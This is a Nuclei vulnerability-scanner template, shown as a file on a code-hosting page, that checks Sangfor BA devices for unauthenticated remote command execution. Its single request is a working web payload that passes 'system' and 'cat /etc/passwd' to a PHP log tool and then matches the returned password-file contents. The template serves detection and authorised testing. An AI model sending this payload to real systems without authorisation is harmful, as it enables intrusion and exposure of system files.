nuclei-templates/vulnerabilities/other/sangfor-ba-rce.yaml

25 lines
545 B
YAML
Raw Normal View History

2022-05-11 18:47:57 +00:00
id: sangfor-ba-rce
info:
name: Sangfor BA RCE
author: ritikchaddha
severity: critical
description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
tags: rce,sangfor
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200